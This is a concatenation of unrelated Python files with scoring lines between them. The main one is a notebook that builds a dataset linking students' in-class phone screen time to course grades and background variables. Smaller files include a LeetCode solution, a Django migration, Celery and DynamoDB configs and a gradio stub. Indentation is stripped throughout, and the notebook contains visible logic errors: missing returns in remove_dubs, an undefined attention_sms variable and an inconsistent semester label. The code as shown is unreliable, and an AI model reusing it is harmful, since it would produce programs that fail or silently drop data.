# ## Check the timestamps of the input datasets
# In[6]:
screen = pd.read_csv('data/raw/fixed/external/screen.csv')
invalidation_stamps = pd.read_pickle('data/preproc/behavior/sensor_time.pkl')
# Find the first and last timebin in the entire experiment:
# In[7]:
first_timebin = ((dt(2013,9,day=1) - dt(year=1970,month=1,day=1)).days) * (24 * 60 * 60)
delta = ((dt(2015, 8, day=31, hour=23, minute=59, second=59) - dt(year=1970, month=1, day=1)))
last_timestamp = (delta.days * 24 * 60 * 60 + delta.seconds)
last_timebin = last_timestamp // timebin_len * timebin_len
# Remove the sensor_time timestamps that lie outside the borders defined by the experiment:
# In[10]:
invalidation_stamps_filtered = invalidation_stamps.loc[(invalidation_stamps['timestamp_5m'] >= first_timebin) & (invalidation_stamps['timestamp_5m'] <= last_timebin)]
# Save the updated timestamps to be used for invalidation
# In[11]:
invalidation_stamps_filtered.to_pickle('personal/asger/preprocessed_data/invalidation_stamps_1m.pkl')
# ## Build screen behaviour data set
# Read in the input datasets for this section:
# In[12]:
screen = pd.read_csv('data/raw/fixed/external/screen.csv')
invalidation_stamps = pd.read_pickle('personal/asger/preprocessed_data/invalidation_stamps_1m.pkl')
user_map = pd.read_pickle('data/preproc/users/all_users.pkl').loc[:,['user_idx','user']]
# Prepare the input data sets, so they fit the function that will build the screen behaviour dataset:
# In[16]:
screen = screen.merge(user_map, how = 'left')
screen = screen.drop('user', axis = 1)
invalidation_stamps = invalidation_stamps.rename(columns = {'timestamp_5m': 'timestamp'})
invalidation_stamps = invalidation_stamps[['timestamp', 'user_idx']]
# Build the screen behaviour dataset with the screen_behaviour function. Note that screen_behaviour is quite time consuming (it has to run overnight). If you want to speed it up, this cell is easy to parallelize with ipyparallel; a commented sketch follows the cell below. Path to the screen_behaviour function: cns/preproc/screen/screen_behaviour.py.
# In[19]:
by_user_screen = [u_df for u,u_df in screen.groupby('user_idx')]
by_user_invalidation = [u_df for u,u_df in invalidation_stamps.groupby('user_idx')]
parsed = [cns.screen_behaviour(screen, invalidation, timebin_len, 3*timebin_len, only_screen_behav = False) for (screen, invalidation) in zip(by_user_screen, by_user_invalidation)]
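# A rough ipyparallel sketch of the cell above (cluster setup and pushing cns/timebin_len
# to the engines are assumed; the arguments mirror the serial call):
#
#   import ipyparallel as ipp
#   view = ipp.Client().load_balanced_view()
#   parsed = view.map_sync(
#       lambda pair: cns.screen_behaviour(pair[0], pair[1], timebin_len, 3 * timebin_len,
#                                         only_screen_behav=False),
#       list(zip(by_user_screen, by_user_invalidation)))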
# In[20]:
invalid_binss = [p[0] for p in parsed]
screen_diffs = [p[1] for p in parsed]
screen_behavs = [p[2] for p in parsed]
n_invs = [p[3] for p in parsed]
invalid_bins = pd.concat(invalid_binss, ignore_index = True)
screen_sessions = pd.concat(screen_diffs, ignore_index = True)
screen_behav = pd.concat(screen_behavs, ignore_index = True)
n_inv = pd.concat(n_invs, ignore_index = True)
# Save the output datasets:
# In[21]:
screen_behav.to_pickle('personal/asger/preprocessed_data/screen_behaviour_1m.pkl')
screen_sessions.to_pickle('personal/asger/preprocessed_data/screen_sessions_1m.pkl')
invalid_bins.to_pickle('personal/asger/preprocessed_data/invalid_bins_1m.pkl')
n_inv.to_pickle('personal/asger/preprocessed_data/invalidation_counts_1m.pkl')
# ## Build screen behaviour in class dataset
# Read in the input datasets for this section:
# In[6]:
screen_behav = pd.read_pickle('personal/asger/preprocessed_data/screen_behaviour_15m.pkl')
attend = pd.read_pickle('data/preproc/behavior/attendance_geofence.pkl')
temp_map = cns.get_temporal_context_frame()[['hourbin', 'semester']]
# In[10]:
attend['timebin'] = attend['timestamp_qrtr'].astype(int)
attend = attend.drop('timestamp_qrtr', axis=1)
# Split the screen behaviour into two parts: One with all the timebins, where a given user attended class, and one where the user did not:
# In[12]:
def merge_attendance(screen_behav, attend, hourbin_semester_map) :
attend = attend.loc[attend.check_attend == 1, :].copy()
attend = attend.drop_duplicates(subset=['user_idx','timebin'])
attend['hourbin'] = attend['timebin'] // 3600 * 3600
attend = attend.merge(hourbin_semester_map, on = 'hourbin', how = 'left')
attend = attend.drop(['hourbin'], axis = 1)
merged = screen_behav.merge(attend, on = ['user_idx', 'timebin'], how = 'left')
inclass = merged[merged.check_attend == 1].copy().drop('check_attend', axis = 1)
notinclass = merged[merged.check_attend != 1].copy().drop(['check_attend', 'course_number', 'semester'], axis = 1)
return inclass, notinclass
# Change the semester for the second part of the math course that runs over two semesters. Also, add semester to course numbers to make sure that the resulting string is a unique course id:
# In[16]:
def change_sem(row) :
if (row['course_number'] == '01005') :
if (row['semester'] == 'fall_2013') :
return 'spring 2014'
elif (row['semester'] == 'fall_2014') :
return 'spring_2015'
else :
return row['semester']
else :
return row['semester']
# In[17]:
screen_behav_inclass, screen_behav_notinclass = merge_attendance(screen_behav, attend, temp_map)
screen_behav_inclass['semester'] = screen_behav_inclass.apply(change_sem, axis = 1)
screen_behav_inclass['course_num_sem'] = screen_behav_inclass['course_number'] + '_' + screen_behav_inclass['semester']
screen_behav_inclass = screen_behav_inclass.drop('course_number', axis = 1)
# In[139]:
screen_behav_inclass['pause_v1'] = (pd.to_datetime(screen_behav_inclass['timebin'],unit='s').dt.minute==45)
screen_behav_inclass['pause_v2'] = (pd.to_datetime(screen_behav_inclass['timebin'],unit='s').dt.minute==0)
# In[140]:
screen_behav_inclass.to_pickle('personal/asger/preprocessed_data/screen_behaviour_inclass.pkl')
screen_behav_notinclass.to_pickle('personal/asger/preprocessed_data/screen_behaviour_notinclass.pkl')
# ## Build course attention and performance dataset
# Read in the input datasets for this section:
# In[6]:
screen_behav_inclass = pd.read_pickle('personal/asger/preprocessed_data/screen_behaviour_inclass.pkl')
grades = pd.read_pickle('data/preproc/dtu/grades_date.pkl')
grades_alt = pd.read_pickle('data/preproc/dtu/grades_alt.pkl')
# Calculate the attention measures:
# In[7]:
attention = screen_behav_inclass.drop(['timebin'], axis = 1) .groupby(['user_idx', 'semester', 'course_num_sem'], as_index = False).mean().drop(['sms','fb_post','pause_v1','pause_v2'],axis=1)
# In[9]:
screen_behav_inclass_nopause_v1 = screen_behav_inclass.loc[~screen_behav_inclass['pause_v1'],['user_idx','course_num_sem','screentime','pause_v1']].copy()
screen_behav_inclass_nopause_v1 = screen_behav_inclass_nopause_v1.drop('pause_v1', axis=1).rename(columns={'screentime':'screentime_nopause_v1'})
attention_nopause_v1 = screen_behav_inclass_nopause_v1.groupby(['user_idx', 'course_num_sem'], as_index = False).mean()
# In[10]:
screen_behav_inclass_nopause_v2 = screen_behav_inclass.loc[~screen_behav_inclass['pause_v2'],['user_idx','course_num_sem','screentime','pause_v2']].copy()
screen_behav_inclass_nopause_v2 = screen_behav_inclass_nopause_v2.drop('pause_v2', axis=1).rename(columns={'screentime':'screentime_nopause_v2'})
attention_nopause_v2 = screen_behav_inclass_nopause_v2.groupby(['user_idx', 'course_num_sem'], as_index = False).mean()
# In[11]:
attention = attention.merge(attention_sms, how='left').merge(attention_nopause_v1, how='left').merge(attention_nopause_v2, how='left')
# In[16]:
grades_alt = grades_alt.dropna(subset=['user_idx', 'class_code'])
# In[19]:
grades_alt['course_number'] = grades_alt.class_code.astype(int).astype(str)
# In[20]:
grades_alt = grades_alt[['course_number', 'user_idx', 'grade', 'semester']]
# In[21]:
counts = screen_behav_inclass[['timebin','user_idx','course_num_sem']] .groupby(['user_idx','course_num_sem'], as_index=False) .count().rename(columns = {'timebin' : 'measurement_count'})
attention = attention.merge(counts, on = ['user_idx','course_num_sem'], how = 'left')
# Filter out observation from the unrelevant semesters and prepare the grades data to be merge:
# In[22]:
relevant_semesters = ['fall_2013','fall_2014','spring_2014','spring_2015']
attention_filt_1 = attention.loc[attention.semester.isin(relevant_semesters), :]
grades['course_num_sem'] = grades['course_number'] + '_' + grades['semester']
grades = grades.loc[grades.user_idx.isin(attention_filt_1.user_idx.unique()), :]
grades = grades.loc[grades.course_num_sem.isin(attention_filt_1.course_num_sem.unique()), :]
grades_alt['course_num_sem'] = grades_alt['course_number'] + '_' + grades_alt['semester']
grades_alt = grades_alt.loc[grades_alt.user_idx.isin(attention_filt_1.user_idx.unique()), :]
grades_alt = grades_alt.loc[grades_alt.course_num_sem.isin(attention_filt_1.course_num_sem.unique()), :]
# In[24]:
grades['grade'] = grades.grade_num_infer.astype(int).astype(str)
# In[27]:
class smart_dic(dict) :
def __missing__(self, key):
return key
grade_map = smart_dic({'00':'0', '02':'2'})
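# e.g. grade_map['00'] -> '0', grade_map['02'] -> '2', grade_map['12'] -> '12' (unknown keys fall through unchanged)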
# In[28]:
grades_alt['grade'] = grades_alt.grade.map(grade_map)
# In[29]:
all_grades = pd.concat([grades[['course_num_sem', 'user_idx', 'grade', 'semester']], grades_alt[['course_num_sem', 'user_idx', 'grade', 'semester']]])
# In[30]:
all_grades = all_grades.drop_duplicates()
# In[33]:
def remove_dubs(df) :
if (len(df)==1) :
return (df)
else:
if (df['grade'].isin(['EM', 'BE', 'S', 'IB', 'SN',
'IG']).all()) :
df.sample(1, random_state=1801)
else :
df = df.loc[~(df['grade'].isin(['EM', 'BE', 'S', 'IB', 'SN',
'IG']))]
if (len(df)==1) :
return (df)
else :
df = df.loc[~(df['grade'] == '-3'),]
if (len(df)==1) :
return (df)
else :
df = df.loc[~(df['grade'] == '-0'),]
if (len(df)==1) :
return (df)
else :
df.sample(1, random_state=1801)
# In[34]:
grouped_grades = [u_df for u,u_df in all_grades.groupby(['user_idx','course_num_sem'])]
# In[36]:
all_grades = pd.concat([remove_dubs(df) for df in grouped_grades], ignore_index=True)
# Merge grades on attention measures:
# In[38]:
attention_w_grades = attention_filt_1.merge(all_grades, on = ['course_num_sem','user_idx','semester'], how = 'inner')
# Save the out dataset:
# In[39]:
attention_w_num_grades = attention_w_grades.loc[attention_w_grades.grade.isin(['-3','0','2','4','7','10','12']),]
# In[40]:
attention_w_num_grades.to_pickle('personal/asger/preprocessed_data/course_attention_performance.pkl')
# ## Build user level control variables
# Read in the input datesets for this section:
# In[67]:
screen_behav = pd.read_pickle('personal/asger/preprocessed_data/screen_behaviour_notinclass.pkl')
grades_primary = pd.read_pickle('data/struct/features/grades_primary.pkl')
grades_highschool = pd.read_pickle('data/struct/features/grades_hs.pkl')
parent_edu = pd.read_pickle('data/struct/features/parent_edu.pkl')
parent_inc = pd.read_pickle('data/struct/features/parent_inc.pkl')
dem = pd.read_pickle('data/struct/features/demographics.pkl')
survey = pd.read_pickle('data/struct/features/survey.pkl')
organization_dtu = pd.read_pickle('data/preproc/dtu/organization.pkl')
user_map = pd.read_pickle('data/preproc/users/all_users.pkl').loc[:,['user_idx','user']]
organization_dtu = organization_dtu.merge(user_map, on='user', how='inner')
temp_context = cns.get_temporal_context_frame()[['hourbin','hour','semester']]
# Calculate the average screen behaviour out of class during daytime:
# In[68]:
def is_day(row) :
if ((1 <= row['hour']) and (row['hour'] <= 6)) :
return False
else :
return True
# In[69]:
temp_context['day'] = temp_context.apply(is_day, axis = 1)
screen_behav['hourbin'] = screen_behav['timebin'] // 3600 * 3600
screen_behav = screen_behav.merge(temp_context, on = 'hourbin')
screen_behav = screen_behav.loc[screen_behav.day, :]
screen_behav = screen_behav.drop(['timebin','hourbin','hour','day'], axis = 1)
# In[18]:
avr_screen_behav = screen_behav.groupby('user_idx', as_index = False).mean()
# Choose the relevant variables in the background variables datasets:
# In[10]:
grades_primary = grades_primary.reset_index()
grades_highschool = grades_highschool.reset_index()
parent_edu = parent_edu.reset_index()
parent_inc = parent_inc.reset_index()
dem = dem.reset_index()
# In[11]:
avr_screen_behav = avr_screen_behav[['user_idx','screentime','screencount']]
avr_screen_behav = avr_screen_behav.rename(columns = {'screentime' : 'screentime_outofclass', 'screencount' : 'screencount_outofclass'})
psychology = survey[['1_bfi_agreeableness', '1_bfi_conscientiousness', '1_bfi_extraversion', '1_bfi_neuroticism', '1_bfi_openness', '1_locus_of_control','1_ambition','1_self_efficacy']].copy()
psychology['user_idx'] = psychology.index
psychology = psychology.rename(columns={'1_bfi_agreeableness':'agreeableness', '1_bfi_conscientiousness':'conscientiousness', '1_bfi_extraversion':'extraversion', '1_bfi_neuroticism':'neuroticism', '1_bfi_openness':'openness', '1_locus_of_control':'locus_of_control', '1_ambition': 'ambition', '1_self_efficacy':'self_efficacy'})
health = survey[['1_bmi', '1_physical_activity', '1_smoke_freq']].copy()
health = health.rename(columns={'1_bmi':'bmi','1_physical_activity':'physichal_activity', '1_smoke_freq': 'smoke_freq'})
health['user_idx'] = health.index
chosen_grades_highschool = grades_highschool[['user_idx','hs_matematik','hs_gpa']]
chosen_grades_highschool = chosen_grades_highschool.rename(columns={'hs_matematik': 'hs_math'})
chosen_grades_primary = grades_primary[['user_idx', 'elem_matematik_exam','elem_gpa']]
chosen_grades_primary = chosen_grades_primary.rename(columns = {'elem_matematik_exam': 'elem_math'})
parent_edu_max = parent_edu[['user_idx', 'edu_max']]
parent_edu_max = parent_edu_max.rename(columns = {'edu_max':'parent_edu_max'})
parent_inc_mean_max = parent_inc[['user_idx', 'inc_max', 'inc_mean']]
parent_inc_mean_max = parent_inc_mean_max.rename(columns = {'inc_max':'parent_inc_max', 'inc_mean': 'parent_inc_mean'})
dem = dem.drop('immig_desc', axis=1)
organization_dtu = organization_dtu[['user_idx', 'study']]
# In[12]:
merged = avr_screen_behav.merge(chosen_grades_primary, on = 'user_idx', how = 'left')
merged = merged.merge(chosen_grades_highschool, on = 'user_idx', how = 'left')
merged = merged.merge(parent_edu_max, on = 'user_idx', how = 'left')
merged = merged.merge(parent_inc_mean_max, on = 'user_idx', how = 'left')
merged = merged.merge(dem, on = 'user_idx', how = 'left')
merged = merged.merge(psychology, on='user_idx',how='left')
merged = merged.merge(health, on='user_idx',how='left')
merged = merged.merge(organization_dtu, on='user_idx',how='left')
# In[79]:
merged.to_pickle('personal/asger/preprocessed_data/user_level_control_vars.pkl')
# ## Build user-course level control variables
# Read the input datasets for this section:
# In[35]:
screen_behav_ooc = pd.read_pickle('personal/asger/preprocessed_data/screen_behaviour_notinclass.pkl')
screen_behav_inclass = pd.read_pickle('personal/asger/preprocessed_data/screen_behaviour_inclass.pkl')
attend = pd.read_pickle('data/preproc/behavior/attendance_geofence.pkl')
temp_map = cns.get_temporal_context_frame()[['hourbin', 'hour', 'semester']]
# In[36]:
def is_day(row) :
if ((1 <= row['hour']) and (row['hour'] <= 6)) :
return False
else :
return True
# In[37]:
temp_map['day'] = temp_map.apply(is_day, axis = 1)
screen_behav_ooc['hourbin'] = screen_behav_ooc['timebin'] // 3600 * 3600
screen_behav_ooc = screen_behav_ooc.merge(temp_map, on = 'hourbin')
screen_behav_ooc = screen_behav_ooc.loc[screen_behav_ooc.day, :]
screen_behav_ooc = screen_behav_ooc.drop(['timebin','hourbin','hour','day'], axis = 1)
# In[38]:
temp_map['day'] = temp_map.apply(is_day, axis = 1)
screen_behav_inclass['hourbin'] = screen_behav_inclass['timebin'] // 3600 * 3600
screen_behav_inclass = screen_behav_inclass.merge(temp_map.drop('semester',axis=1), on = 'hourbin')
screen_behav_inclass = screen_behav_inclass.loc[screen_behav_inclass.day, :]
screen_behav_inclass = screen_behav_inclass.drop(['timebin','hourbin','hour','day'], axis = 1)
# In[39]:
avr_screen_behav_ooc_semester = screen_behav_ooc.groupby(['user_idx','semester'], as_index = False).mean()
# In[40]:
avr_screen_behav_inclass_semester = screen_behav_inclass.groupby(['user_idx','semester'], as_index = False).mean()
# Calculate how much of the time each user attended scheduled classtime for the courses, he/she was signed up for:
# In[41]:
attend = attend.rename(columns = {'timestamp_qrtr' : 'timebin'})
attend = attend.loc[~ np.isnan(attend.check_attend), :].copy()
attend['hourbin'] = attend['timebin'] // 3600 * 3600
attend = attend.merge(temp_map, on = 'hourbin', how = 'left')
attend = attend.drop(['hourbin'], axis = 1)
attend['course_num_sem'] = attend['course_number'] + "_" + attend['semester']
# In[42]:
avr_attendance = attend.drop(['course_number','timebin','hour','day'], axis = 1).groupby(['user_idx','course_num_sem','semester'],as_index=False).mean()
# In[43]:
avr_attendance = avr_attendance.rename(columns={'check_attend':'attendance'})
avr_attendance['attendance'] = avr_attendance['attendance']*100
# In[44]:
avr_attendance_semester = attend.drop(['course_number','timebin','hour'], axis = 1).groupby(['user_idx','semester'],as_index=False).mean()
# In[45]:
avr_attendance = avr_attendance.merge(avr_attendance_semester.rename(columns={'check_attend':'attendance_semester'}), on=['user_idx','semester'])
# In[47]:
avr_screen_behav_inclass_semester = avr_screen_behav_inclass_semester.rename(columns={'screentime':'screentime_semester'})
avr_screen_behav_ooc_semester = avr_screen_behav_ooc_semester.rename(columns={'screentime':'screentime_outofclass_semester'})
# In[49]:
usercoursectrls = avr_attendance.merge(avr_screen_behav_ooc_semester[['user_idx','semester','screentime_outofclass_semester']],on=['user_idx','semester'],how='left').merge(avr_screen_behav_inclass_semester[['user_idx','semester','screentime_semester']],on=['user_idx','semester'],how='left')
# In[51]:
usercoursectrls = usercoursectrls.drop(['semester','day'],axis=1)
# In[52]:
usercoursectrls.to_pickle('personal/asger/preprocessed_data/user_course_level_control_vars.pkl')
# ## Build analysis dataset
# Read in the input datasets for this section:
# In[80]:
course_att_perf = pd.read_pickle('personal/asger/preprocessed_data/course_attention_performance.pkl')
user_cont_vars = pd.read_pickle('personal/asger/preprocessed_data/user_level_control_vars.pkl')
user_course_cont_vars = pd.read_pickle('personal/asger/preprocessed_data/user_course_level_control_vars.pkl')
# Merge the control variables in the attention performance dataset:
# In[82]:
analysis = course_att_perf.merge(user_cont_vars, on=['user_idx'], how='left').merge(user_course_cont_vars, on=['user_idx', 'course_num_sem'], how='left')
# In[84]:
analysis_filt1 = analysis.loc[~((analysis.screentime_outofclass == 0) & (analysis.screentime_uavr == 0))].copy()
# In[86]:
analysis_filt2 = analysis_filt1[analysis_filt1['measurement_count']>=40]
# In[88]:
analysis_filt2.to_csv('personal/asger/preprocessed_data/analysis.csv', index=False)
# In[35]:
x = analysis_filt2[['user_idx','semester','course_num_sem', 'screentime_short_ses',
'screencount_short_ses', 'screentime_long_ses', 'screencount_long_ses',
'screentime', 'screencount','attendance','grade']]
# In[36]:
x.to_pickle('personal/asger/preprocessed_data/screen_attendance_course_specific.pkl')
| 2.703125
| 3
|
src/283. Move Zeroes.py
|
rajshrivastava/LeetCode
| 1
|
12784846
|
<filename>src/283. Move Zeroes.py
from typing import List

class Solution:
def moveZeroes(self, nums: List[int]) -> None:
"""
Do not return anything, modify nums in-place instead.
"""
ptr1 = 0
for num in nums:
if num:
nums[ptr1] = num
ptr1 += 1
for i in range(ptr1, len(nums)):
nums[i] = 0
| 3.5625
| 4
|
apps/Testings/migrations/0004_auto_20170925_1703.py
|
ulibn/BlueXolo
| 21
|
12784847
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.4 on 2017-09-25 22:03
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('Testings', '0003_collection'),
]
operations = [
migrations.RenameField(
model_name='collection',
old_name='products',
new_name='product',
),
]
| 1.679688
| 2
|
wowgic/old_builds/wowgic_flask_3Mar/config/celeryconfig.py
|
chelladurai89/wowgicbackend2.0
| 0
|
12784848
|
import os
from celery.schedules import crontab
CELERY_BROKER_URL='amqp://guest@localhost//'
CELERY_RESULT_BACKEND = 'mongodb://localhost:27017/'
CELERY_MONGODB_BACKEND_SETTINGS = {
'database': 'wowgicflaskapp',
'taskmeta_collection': 'my_taskmeta_collection',
}
#CELERY_ACCEPT_CONTENT = ['pickle', 'json']
#CELERY_TASK_SERIALIZER='json'
#CELERY_RESULT_SERIALIZER='json'
#CELERY_TIMEZONE='Europe/Oslo'
CELERY_ENABLE_UTC=True
IP = os.uname()[1]
PORT = 8080
NEO4J_IP='127.0.0.1'
MONGODB_HOST = '127.0.0.1'
MONGODB_PORT = '27017'
MONGODB_USERNAME = 'admin'
MONGODB_PASSWORD = '<PASSWORD>'
LOGGER_NAME='wowgic_dev'
CELERYBEAT_SCHEDULE = {  # runs tasks.getAllInterestNode every 15 minutes
'getAllInterestNode_every15mins': {
'task': 'tasks.getAllInterestNode',
'schedule': crontab(minute='*/15'),
},
}
| 1.882813
| 2
|
appzoo/apps_gradio/demo.py
|
SunYanCN/AppZoo
| 5
|
12784849
|
<filename>appzoo/apps_gradio/demo.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Project : AppZoo.
# @File : demo
# @Time : 2021/9/6 上午9:51
# @Author : yuanjie
# @WeChat : 313303303
# @Software : PyCharm
# @Description :
# /Users/yuanjie/Library/Python/3.7/lib/python/site-packages/pip
# <module 'gradio' from '/Users/yuanjie/Library/Python/3.7/lib/python/site-packages/gradio/__init__.py'>
import gradio
print(gradio)
| 1.484375
| 1
|
config.py
|
corbinmcneill/bonkbot
| 1
|
12784850
|
import boto3
#class Command:
# def __init__(self, description,
class Config:
dynamodb = boto3.resource('dynamodb')
def __init__(self, table_name):
self.table = self.dynamodb.Table(table_name)
def get(self, key):
response = self.table.get_item(Key = {'Key' : key}, ConsistentRead = True)
return response['Item']['Value']
def put(self, key, value):
self.table.put_item(Item = {'Key' : key, 'Value' : value})
config = Config('BonkBotConfig')
# using the singleton pattern
def get_instance():
return config
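# Usage sketch (key and value below are illustrative; the DynamoDB table must already exist):
#   cfg = get_instance()
#   cfg.put("prefix", "!")
#   print(cfg.get("prefix"))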
| 2.5625
| 3
|